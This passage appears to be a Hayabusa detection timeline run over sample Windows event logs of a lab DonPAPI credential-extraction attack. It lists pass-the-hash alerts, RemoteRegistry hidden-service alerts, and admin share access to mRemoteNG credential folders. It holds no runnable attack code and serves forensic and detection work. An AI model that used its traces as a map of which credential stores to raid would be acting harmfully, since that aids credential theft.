%%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.790 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.821 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network 
Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
